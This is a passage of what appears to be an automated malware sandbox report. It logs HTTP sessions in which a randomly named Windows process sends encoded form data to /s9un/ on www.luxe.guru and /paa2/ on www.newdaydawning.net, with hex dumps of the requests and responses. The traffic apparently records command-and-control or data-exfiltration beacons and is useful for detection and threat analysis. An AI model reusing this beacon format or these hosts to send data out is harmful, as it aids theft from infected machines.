Sep 26, 2024 14:24:22.813498020 CEST	610	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:22 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	13.248.169.48	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:27.871404886 CEST	717	OUT	POST /s9un/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.luxe.guru Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.luxe.guru Referer: http://www.luxe.guru/s9un/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 2f 58 54 7a 65 52 70 58 45 7a 48 44 67 45 45 52 49 42 46 4a 45 57 79 6c 50 30 69 49 43 5a 6f 49 6a 6a 74 59 73 47 54 6a 36 38 45 66 4d 36 76 78 2f 69 43 4b 34 47 71 57 36 6b 48 42 7a 6f 49 56 56 35 35 74 63 48 66 76 68 38 32 7a 59 68 44 39 44 62 61 54 4c 50 2f 6b 79 35 36 44 78 4d 79 57 7a 4f 7a 2f 67 39 63 52 41 46 73 56 30 4e 47 7a 75 71 55 48 48 38 52 59 57 4d 4e 34 71 68 38 69 4c 53 51 61 37 59 2b 74 66 45 68 46 50 45 50 35 34 4c 52 41 63 47 2f 54 70 6e 6c 77 48 51 70 6e 72 38 43 53 31 6d 74 74 39 31 6d 58 55 42 4d 6e 43 41 42 41 52 64 43 64 6b 62 4e 73 44 55 4d 63 68 41 3d 3d Data Ascii: sL9tFJ=/XTzeRpXEzHDgEERIBFJEWylP0iICZoIjjtYsGTj68EfM6vx/iCK4GqW6kHBzoIVV55tcHfvh82zYhD9DbaTLP/ky56DxMyWzOz/g9cRAFsV0NGzuqUHH8RYWMN4qh8iLSQa7Y+tfEhFPEP54LRAcG/TpnlwHQpnr8CS1mtt91mXUBMnCABARdCdkbNsDUMchA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	13.248.169.48	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:30.437864065 CEST	737	OUT	POST /s9un/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.luxe.guru Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.luxe.guru Referer: http://www.luxe.guru/s9un/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 2f 58 54 7a 65 52 70 58 45 7a 48 44 67 6b 30 52 4c 6d 70 4a 54 6d 79 71 45 55 69 49 62 70 6f 4d 6a 6a 70 59 73 45 2f 7a 37 50 67 66 4d 62 66 78 2b 6a 43 4b 78 57 71 57 78 45 47 4c 33 6f 49 4f 56 35 31 6c 63 43 33 76 68 38 79 7a 59 6c 4c 39 45 6f 43 55 4e 50 2f 6d 72 4a 36 42 31 4d 79 57 7a 4f 7a 2f 67 39 59 76 41 42 41 56 33 39 61 7a 75 49 77 45 45 38 52 66 54 38 4e 34 67 42 38 6d 4c 53 51 6f 37 59 50 41 66 47 4a 46 50 42 4c 35 34 65 74 50 4a 32 2f 64 6b 48 6b 36 4e 77 73 55 6e 38 36 54 6f 58 49 4d 33 6b 7a 32 52 48 64 39 54 78 67 58 44 64 6d 75 35 63 45 59 4f 58 78 56 36 45 57 43 66 39 6e 68 39 36 6a 51 6d 55 35 78 30 45 38 78 50 66 38 3d Data Ascii: sL9tFJ=/XTzeRpXEzHDgk0RLmpJTmyqEUiIbpoMjjpYsE/z7PgfMbfx+jCKxWqWxEGL3oIOV51lcC3vh8yzYlL9EoCUNP/mrJ6B1MyWzOz/g9YvABAV39azuIwEE8RfT8N4gB8mLSQo7YPAfGJFPBL54etPJ2/dkHk6NwsUn86ToXIM3kz2RHd9TxgXDdmu5cEYOXxV6EWCf9nh96jQmU5x0E8xPf8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	13.248.169.48	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:32.994908094 CEST	10819	OUT	POST /s9un/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.luxe.guru Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.luxe.guru Referer: http://www.luxe.guru/s9un/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 2f 58 54 7a 65 52 70 58 45 7a 48 44 67 6b 30 52 4c 6d 70 4a 54 6d 79 71 45 55 69 49 62 70 6f 4d 6a 6a 70 59 73 45 2f 7a 37 50 6f 66 4d 4e 44 78 2f 41 61 4b 72 57 71 57 79 45 47 4b 33 6f 4a 4d 56 36 46 68 63 43 37 52 68 2f 61 7a 5a 43 4c 39 46 5a 43 55 65 76 2f 6d 32 35 36 41 78 4d 7a 55 7a 4f 69 33 67 39 6f 76 41 42 41 56 33 38 71 7a 6e 36 55 45 4a 63 52 59 57 4d 4d 71 71 68 38 43 4c 55 34 34 37 5a 36 39 63 32 70 46 4f 68 62 35 37 73 46 50 56 6d 2f 49 6a 48 6c 76 4e 78 51 4c 6e 38 6e 71 6f 58 39 5a 33 6b 48 32 51 44 59 2f 43 46 34 4e 51 2b 4f 32 73 72 34 50 42 6e 78 6a 35 54 43 69 62 39 54 46 6c 34 7a 50 71 44 41 67 6a 46 64 79 64 71 64 6d 4b 6c 47 4f 2f 71 74 4c 6c 79 6d 64 61 72 34 6d 5a 71 45 54 5a 54 34 38 6f 2b 50 42 62 5a 30 4b 4f 77 6f 59 4d 73 6e 61 72 6a 32 35 38 52 6d 71 43 5a 66 78 37 69 66 57 4f 62 7a 72 6a 74 52 30 4c 6d 5a 71 7a 65 42 6d 66 30 61 78 42 4f 2b 38 67 63 70 46 32 6f 6a 56 38 5a 4f 6c 6c 68 41 4a 32 65 4a 49 69 67 78 34 52 39 34 2b 47 70 30 72 36 31 62 [TRUNCATED] Data Ascii: sL9tFJ=/XTzeRpXEzHDgk0RLmpJTmyqEUiIbpoMjjpYsE/z7PofMNDx/AaKrWqWyEGK3oJMV6FhcC7Rh/azZCL9FZCUev/m256AxMzUzOi3g9ovABAV38qzn6UEJcRYWMMqqh8CLU447Z69c2pFOhb57sFPVm/IjHlvNxQLn8nqoX9Z3kH2QDY/CF4NQ+O2sr4PBnxj5TCib9TFl4zPqDAgjFdydqdmKlGO/qtLlymdar4mZqETZT48o+PBbZ0KOwoYMsnarj258RmqCZfx7ifWObzrjtR0LmZqzeBmf0axBO+8gcpF2ojV8ZOllhAJ2eJIigx4R94+Gp0r61bezDFcIpYuAsmfvLcjIUq3gO9wpWaGNxYxeRsAu6gNP1clbqjLFa0ZQFN2EhqBE3SbI/13exiRM5DyDxK3ODV5oMGoRj/cpUc2gjNqTnNdxrk/64rpFUUg2t5plFvvn/h8ENY9ZI5BQjy+DTOayZYAAoWPyduHwdti+wUpIfNG66l4o/bSIXkG2Po2t6j8SH/5IFR3MjnoCTZk2kRtM1Hj0y3Tj4C5daefcNAGBOJx+DWRJmFF2VnvmNdg50l1vdiSjcj2EAK328dfI45+yAyZElk1+4SGasBAnviWvNAMwxrrmtNJlA/FD4NXKQJ/w2SZGE2nSHLvuAiunBKPDutk/Dmj8/E/4PzQ6fPIlLfcGpqcy6hDTgwA8XOSktN4denCQ1KASmvT0bRV7TkR8xigtqNeMJhk4sluF/DDvWU8fBVGmIiG3XBq9kajxHnJ+qq+ufd103cYNiHQSTazORsXx9LRlv4/pcMsg3K1zcAtR2Z19mbHdNP0QkYZTIGRqbPJZwWGbkLA+TgU5OTMzONqfHeHL3Zx9PjYfsL9BkKj7N/n14ndfPjYTbj+FVn/iCTlW0phvzfhbgETQSzSKGOnOm/y1MCDGz8r2IcoMXhMRDpK6I6BPB9PCHiJwvBcjkTFxNTjftzsniXrfHmw6CsK1s+ZVHu/qEzw2 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	13.248.169.48	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:35.539439917 CEST	457	OUT	GET /s9un/?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.luxe.guru Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:24:35.998577118 CEST	396	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 12:24:35 GMT Content-Type: text/html Content-Length: 256 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 4c 39 74 46 4a 3d 79 56 37 54 64 6b 78 66 44 68 6a 64 39 30 42 30 4b 53 45 75 4b 30 4b 71 66 69 2b 77 44 61 49 56 30 7a 42 65 6f 31 2f 31 36 34 67 75 50 4a 66 57 33 69 4b 43 39 48 79 4c 32 31 47 35 32 2f 41 4b 51 71 35 75 61 41 72 2b 79 74 6e 6f 51 54 7a 36 55 49 4f 7a 56 76 58 63 79 2f 44 63 7a 74 2f 55 79 4d 54 4b 2b 5a 59 48 48 43 45 47 77 38 61 78 30 5a 41 53 52 76 49 3d 26 67 42 37 74 3d 78 46 71 58 31 68 43 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	44.213.25.70	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:41.055538893 CEST	741	OUT	POST /paa2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.newdaydawning.net Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.newdaydawning.net Referer: http://www.newdaydawning.net/paa2/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 71 35 4e 59 71 2b 43 54 4a 6b 41 52 70 78 48 4f 51 71 58 34 48 62 77 41 32 33 6d 47 49 4f 54 4e 41 73 4a 38 38 74 72 72 36 58 47 6c 51 35 7a 33 4c 63 6a 36 7a 75 7a 71 64 45 2f 42 44 75 72 68 41 78 68 69 4f 38 34 5a 71 2f 2f 68 77 36 34 51 38 68 61 43 64 2b 34 44 57 33 41 74 43 66 4c 4f 64 35 7a 4a 44 68 63 48 77 71 4d 51 6c 37 31 35 35 39 45 2b 34 46 34 6f 33 31 4d 54 70 68 30 5a 41 59 4f 79 63 2f 44 79 2b 64 41 6c 4c 43 56 57 30 2b 6f 4e 64 6b 76 4f 48 75 2b 38 53 45 66 4f 52 34 68 34 4b 4a 35 58 51 32 46 67 49 4d 65 52 67 55 66 78 45 62 42 50 54 70 51 7a 76 73 4c 52 78 51 3d 3d Data Ascii: sL9tFJ=q5NYq+CTJkARpxHOQqX4HbwA23mGIOTNAsJ88trr6XGlQ5z3Lcj6zuzqdE/BDurhAxhiO84Zq//hw64Q8haCd+4DW3AtCfLOd5zJDhcHwqMQl71559E+4F4o31MTph0ZAYOyc/Dy+dAlLCVW0+oNdkvOHu+8SEfOR4h4KJ5XQ2FgIMeRgUfxEbBPTpQzvsLRxQ==
Sep 26, 2024 14:24:42.330480099 CEST	489	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:41 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Sep 26, 2024 14:24:42.330751896 CEST	1236	IN	Data Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles \|\| ''window.lightspeedOptimizeStylesheet = function () {const currentSt
Sep 26, 2024 14:24:42.330765009 CEST	1236	IN	Data Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79 Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTMLcurrentStylesheet.s
Sep 26, 2024 14:24:42.330775976 CEST	125	IN	Data Raw: 65 6d 65 6e 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 20 21 3d 3d 20 27 48 45 41 44 27 20 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 20 73 74 79 6c 65 53 68 65 65 74 45 Data Ascii: ement.parentElement.tagName !== 'HEAD' ) {document.head.append( styleSheetElement )}}}</script>
Sep 26, 2024 14:24:42.345171928 CEST	1236	IN	Data Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65 Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
Sep 26, 2024 14:24:42.345185995 CEST	1236	IN	Data Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77 Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
Sep 26, 2024 14:24:42.345195055 CEST	448	IN	Data Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 Data Ascii: apper[class="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
Sep 26, 2024 14:24:42.345278025 CEST	1236	IN	Data Raw: 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 Data Ascii: ;margin-left:0px !important;margin-right:0px !important;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"] ul.tve_w_menu li:not(#increase-spec):not(.ccls):focus,.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-
Sep 26, 2024 14:24:42.345288038 CEST	1236	IN	Data Raw: 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a 3d 22 64 61 72 6b 2d 74 6d 70 22 5d 20 75 6c 2e 74 76 65 5f 77 Data Ascii: nu.thrv_wrapper[class="tve-custom-menu-switch-icon-"][class="dark-tmp"] ul.tve_w_menu li .sub-menu li{background-color:rgb(41,41,42);}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"][class="dark-tmp"] ul.tve_w_menu li >
Sep 26, 2024 14:24:42.345298052 CEST	1236	IN	Data Raw: 63 69 74 79 3a 30 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d Data Ascii: city:0;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger.tve-triggered-icon .tcb-icon-close{opacity:1;}.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-dro
Sep 26, 2024 14:24:42.345308065 CEST	1236	IN	Data Raw: 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 72 69 67 68 74 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 2c 2e 74 68 72 76 5f 77 Data Ascii: witch-icon-"].tve-mobile-side-right ul.tve_w_menu::-webkit-scrollbar-track,.thrv_widget_menu.thrv_wrapper[class="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu::-webkit-scrollbar-track,.thrv_widget_menu.thrv_wrapper[class=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	44.213.25.70	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:43.603724957 CEST	761	OUT	POST /paa2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.newdaydawning.net Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.newdaydawning.net Referer: http://www.newdaydawning.net/paa2/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 71 35 4e 59 71 2b 43 54 4a 6b 41 52 6f 53 50 4f 54 4a 2f 34 47 37 77 44 7a 33 6d 47 66 65 54 4a 41 73 46 38 38 73 76 37 37 6c 69 6c 51 59 76 33 4b 59 2f 36 36 2b 7a 71 46 55 2b 4c 4d 4f 72 51 41 77 63 58 4f 2b 73 5a 71 2f 72 68 77 2f 63 51 39 53 79 42 62 2b 34 64 61 58 41 72 66 50 4c 4f 64 35 7a 4a 44 68 67 39 77 71 30 51 6c 50 78 35 72 4d 45 2f 32 6c 34 76 6a 6c 4d 54 74 68 30 64 41 59 4f 62 63 2b 66 55 2b 62 45 6c 4c 47 52 57 30 4b 38 4b 45 55 76 4d 61 2b 2b 6a 64 33 4f 66 59 4c 51 50 42 4c 6c 6d 61 6c 73 46 4e 4b 50 4c 78 6c 2b 6d 57 62 6c 38 4f 75 5a 48 69 76 32 59 71 58 38 31 56 75 71 76 46 6d 2f 7a 63 74 4d 41 53 4d 39 41 59 61 59 3d Data Ascii: sL9tFJ=q5NYq+CTJkARoSPOTJ/4G7wDz3mGfeTJAsF88sv77lilQYv3KY/66+zqFU+LMOrQAwcXO+sZq/rhw/cQ9SyBb+4daXArfPLOd5zJDhg9wq0QlPx5rME/2l4vjlMTth0dAYObc+fU+bElLGRW0K8KEUvMa++jd3OfYLQPBLlmalsFNKPLxl+mWbl8OuZHiv2YqX81VuqvFm/zctMASM9AYaY=
Sep 26, 2024 14:24:45.000803947 CEST	489	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:44 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Sep 26, 2024 14:24:45.001470089 CEST	1236	IN	Data Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles \|\| ''window.lightspeedOptimizeStylesheet = function () {const currentSt
